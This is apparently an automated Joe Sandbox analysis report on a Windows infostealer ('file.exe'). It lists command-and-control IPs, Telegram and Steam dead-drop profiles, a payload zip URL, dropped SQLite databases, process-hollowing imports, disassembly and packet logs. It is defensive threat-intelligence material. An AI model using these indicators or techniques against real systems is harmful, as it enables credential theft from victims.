http://88.198.94.71:80/233910279258.zipd87633a38bb03555514232-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6	0%	Avira URL Cloud	safe
http://116.202.6.206:80	3%	Virustotal		Browse
http://88.198.94.71/1148	4%	Virustotal		Browse
http://88.198.94.71/	1%	Virustotal		Browse
http://88.198.94.71:80/233910279258.zip	0%	Avira URL Cloud	safe
http://88.198.94.71:80/233910279258.zip8C	0%	Avira URL Cloud	safe
http://88.198.94.71/233910279258.zip	0%	Avira URL Cloud	safe
http://88.198.94.71/	0%	Avira URL Cloud	safe
http://116.202.6.206:80	0%	Avira URL Cloud	safe
http://88.198.94.71/1148	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://88.198.94.71/1148	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/asifrazatg	false		high
http://88.198.94.71/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://88.198.94.71/233910279258.zip	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	58308559385186415876143610.2.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://duckduckgo.com/chrome_newtab	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://t.me/	file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://88.198.94.71:80/233910279258.zipd87633a38bb03555514232-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6	file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://116.202.6.206:80	file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	58308559385186415876143610.2.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://web.telegram.org	file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/asifrazatg&	file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/asifrazatghttps://steamcommunity.com/profiles/76561199439929669http://116.202.6.206:80p	file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	58308559385186415876143610.2.dr	false		high
http://88.198.94.71:80/233910279258.zip8C	file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://88.198.94.71:80/233910279258.zip	file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	58308559385186415876143610.2.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://steamcommunity.com/profiles/76561199439929669	file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.sqlite.org/copyright.html.	file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257451716.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
88.198.94.71	unknown	Germany		24940	HETZNER-ASDE	false
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756295
Start date and time:	2022-11-30 00:09:10 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 34s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.spyw.evad.winEXE@10/6@1/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 25.7% (good quality ratio 24.3%) Quality average: 79.3% Quality standard deviation: 29.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com
TCP Packets have been reduced to 100
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.47881670276786453
Encrypted:	false
SSDEEP:	96:eVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:eVK+H3HDi9GN6IVj3XBBE3u
MD5:	C8A54C5A54BC6D813A12E47887D86821
SHA1:	98DDD99BBA14B47B75D4F8A53792221D162483FC
SHA-256:	00E175AD7C78A730A2754729174655A8686A663E878B88564F1D6164746FCF86
SHA-512:	BBC033381816DE6A86F34917F4A13486BE35DE0A4C4FD94EBF1306CDB106331C3417051B4269BA182D6410629513C92EB2700CCF6FDF4CF6415696B15C97ED51
Malicious:	false
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\11565709257171813179063097

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2889923589460437
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
MD5:	7901DD9DF50A993306401B7360977746
SHA1:	E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
SHA-256:	1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
SHA-512:	90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\48870274652683548820497570

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.47881670276786453
Encrypted:	false
SSDEEP:	96:eVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:eVK+H3HDi9GN6IVj3XBBE3u
MD5:	C8A54C5A54BC6D813A12E47887D86821
SHA1:	98DDD99BBA14B47B75D4F8A53792221D162483FC
SHA-256:	00E175AD7C78A730A2754729174655A8686A663E878B88564F1D6164746FCF86
SHA-512:	BBC033381816DE6A86F34917F4A13486BE35DE0A4C4FD94EBF1306CDB106331C3417051B4269BA182D6410629513C92EB2700CCF6FDF4CF6415696B15C97ED51
Malicious:	false
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\58308559385186415876143610

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2889923589460437
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
MD5:	7901DD9DF50A993306401B7360977746
SHA1:	E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
SHA-256:	1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
SHA-512:	90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\82308976761520470245380715

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4393511334109407
Encrypted:	false
SSDEEP:	24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
MD5:	8C31C5487A97BBE73711C5E20600C1F6
SHA1:	D4D6B04226D8FFC894749B3963E7DB7068D6D773
SHA-256:	A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
SHA-512:	394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\82668342394913559298137947

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.359412301232748
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	371200
MD5:	5367709f0a96713b5c9a518e13f306d6
SHA1:	244bdcc9a3548101cacc9c4f8912fb8631764b40
SHA256:	2cc0be582a350f1eafb6d3c6cc713393098a6936346a9070ba55abd346dfb090
SHA512:	e8ef72e92e7524f8529e4b9f0232550c07ced72971bff2072d1f81989a1f6174fca03100b540f777d87fd0048048af31bfd203c51d30ec584d490cb3424f84f8
SSDEEP:	6144:/Xd9qQwRToa3lQZCsPuugr+mJ35AfpJW+0sZZLBO+jJJM9KSlAo8hV:fdEVBoOlQnuuG+k3efD6sjLelAdb
TLSH:	8E84E041E718469EC97919F60431971F6F5458900FA082EB438FBE6A6B3368B87EFC43
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7?.yYl.yYl.yYl...l.yYl..]m.yYl..Zm.yYl..\m.yYl..Xm.yYl..Xm.yYl.yXl.yYlT.Pm.yYlT..l.yYlT.[m.yYlRich.yYl................PE..L..

File Icon


Icon Hash:	00c1062769747441

Static PE Info

General

Entrypoint:	0x402851
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6385E4DB [Tue Nov 29 10:54:19 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	6294a2f7da3a84900c7e91cad8ab870e

Entrypoint Preview

Instruction
call 00007FCC80F5E025h
jmp 00007FCC80F5D86Fh
retn 0000h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040402Ch]
push dword ptr [ebp+08h]
call dword ptr [00404058h]
push C0000409h
call dword ptr [00404030h]
push eax
call dword ptr [00404034h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00404038h]
test eax, eax
je 00007FCC80F5D9F7h
push 00000002h
pop ecx
int 29h
mov dword ptr [0044EFC8h], eax
mov dword ptr [0044EFC4h], ecx
mov dword ptr [0044EFC0h], edx
mov dword ptr [0044EFBCh], ebx
mov dword ptr [0044EFB8h], esi
mov dword ptr [0044EFB4h], edi
mov word ptr [0044EFE0h], ss
mov word ptr [0044EFD4h], cs
mov word ptr [0044EFB0h], ds
mov word ptr [0044EFACh], es
mov word ptr [0044EFA8h], fs
mov word ptr [0044EFA4h], gs
pushfd
pop dword ptr [0044EFD8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0044EFCCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0044EFD0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0044EFDCh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [0044EF18h], 00000001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x48fc	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0xddd8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5e000	0x310	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4300	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4240	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4000	0x11c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2144	0x2200	False	0.5970818014705882	data	6.109737699299444	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4000	0x10a6	0x1200	False	0.3993055555555556	data	4.440653872428405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6000	0x497a8	0x49000	False	0.9481585776969178	data	7.658127773950707	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x50000	0xddd8	0xde00	False	0.09496410472972973	data	3.179746451017983	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5e000	0x310	0x400	False	0.7275390625	data	5.550811047884393	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x500f0	0xda28	Device independent bitmap graphic, 105 x 256 x 32, image size 53760, resolution 25259 x 25259 px/m	Russian	Russia
RT_GROUP_ICON	0x5db18	0x14	data	Russian	Russia
RT_VERSION	0x5db30	0x2a8	data

Imports

DLL	Import
KERNEL32.dll	GetModuleFileNameA, WriteProcessMemory, ResumeThread, GetModuleHandleA, GetThreadContext, GetProcAddress, ExitProcess, ReadProcessMemory, CreateProcessA, SetThreadContext, IsDebuggerPresent, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, UnhandledExceptionFilter
MSVCP140.dll	?_Xlength_error@std@@YAXPBD@Z
VCRUNTIME140.dll	_except_handler4_common, memset, __current_exception_context, memcpy, _CxxThrowException, __std_exception_copy, __std_exception_destroy, __CxxFrameHandler3, __current_exception, memmove
api-ms-win-crt-runtime-l1-1-0.dll	_crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _register_onexit_function, _initterm, _initterm_e, _exit, exit, _c_exit, _register_thread_local_exe_atexit_callback, _initialize_narrow_environment, _configure_narrow_argv, _get_narrow_winmain_command_line, terminate, _controlfp_s, _initialize_onexit_table, _invalid_parameter_noinfo_noreturn
api-ms-win-crt-stdio-l1-1-0.dll	_set_fmode, __p__commode
api-ms-win-crt-utility-l1-1-0.dll	rand, srand
api-ms-win-crt-heap-l1-1-0.dll	_callnewh, malloc, free, _set_new_mode
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:10:03.696094990 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:03.696155071 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:03.696418047 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:03.747873068 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:03.747900009 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:03.825840950 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:03.825999022 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.305008888 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.305059910 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.305671930 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.310623884 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.318892956 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.318938017 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355186939 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355230093 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355340004 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355359077 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355654955 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.483719110 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.483772993 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.509978056 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.548715115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.548928022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.549756050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.589503050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.694690943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.694907904 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.722865105 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.761621952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762178898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762217045 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762237072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762262106 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762298107 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762319088 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762325048 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.762351036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762366056 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.762372971 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762396097 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.762401104 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762422085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762438059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.762460947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.800975084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801017046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801089048 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801126957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801203966 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801224947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801260948 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801296949 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801311016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801341057 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801362991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801369905 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801384926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801392078 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801428080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801451921 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801453114 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801472902 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801482916 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801496029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801517010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801517963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801541090 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801574945 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801589966 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801599979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801621914 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801631927 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801645041 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801661015 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801666975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801701069 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801937103 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840192080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840213060 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840240002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840260983 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840298891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840318918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840343952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840363979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840401888 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840419054 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840430021 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840451002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840475082 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840476036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840497017 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840523005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840543985 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840563059 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840573072 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840585947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840595961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840616941 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840636969 CET	80	49708	88.198.94.71	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:10:03.656122923 CET	56588	53	192.168.2.7	8.8.8.8
Nov 30, 2022 00:10:03.672709942 CET	53	56588	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2022 00:10:03.656122923 CET	192.168.2.7	8.8.8.8	0x2a4	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 30, 2022 00:10:03.672709942 CET	8.8.8.8	192.168.2.7	0x2a4	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

88.198.94.71

Target ID:	0
Start time:	00:10:02
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xe80000
File size:	371200 bytes
MD5 hash:	5367709F0A96713B5C9A518E13F306D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
